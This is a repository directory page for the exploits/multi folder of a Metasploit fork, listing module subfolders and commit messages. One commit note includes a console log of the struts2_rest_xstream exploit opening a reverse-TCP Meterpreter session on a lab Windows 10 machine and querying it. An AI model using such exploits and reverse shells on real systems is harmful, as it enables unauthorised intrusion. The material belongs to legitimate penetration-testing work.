adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
df5f4caaae504285665fc7ff8a75e98c4b4df9b1
metasploit-gs/modules/exploits/multi
T
History
William Vu df5f4caaae Uncomment PSH target in struts2_rest_xstream 
I'm full of shit. It works.

msf5 exploit(multi/http/struts2_rest_xstream) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Powershell command length: 2467
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49691) at 2018-08-27 20:00:47 -0500

meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
2018-08-27 20:01:00 -05:00
..
browser
Land #9908, msfd_rce_remote and msfd_rce_browser
2018-04-27 18:54:17 -05:00
elasticsearch
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
fileformat
Revised 88 aux and exploit modules to add CVEs / references
2018-07-12 17:34:52 -05:00
ftp
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
gdb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
hams
fix incorrect disclosure date
2018-05-25 02:59:08 -05:00
http
Uncomment PSH target in struts2_rest_xstream
2018-08-27 20:01:00 -05:00
ids
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
local
Update tested versions
2018-02-10 16:32:20 +00:00
misc
Update false negatives on post auth information
2018-08-20 15:43:07 -05:00
mysql
Update false negatives on post auth information
2018-08-20 15:43:07 -05:00
ntp
Change author name to nick.
2017-11-09 03:00:24 +11:00
php
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
postgres
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
realserver
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
samba
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
sap
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
script
remove errant bracket, formatting update
2017-10-26 15:01:53 -05:00
ssh
Make style consistent
2018-08-15 21:27:40 -05:00
svn
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
upnp
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
vnc
Update false negatives on post auth information
2018-08-20 15:43:07 -05:00
vpn
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
wyse
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
handler.rb
if multi/handler is disabled, exit
2018-02-27 04:30:09 -06:00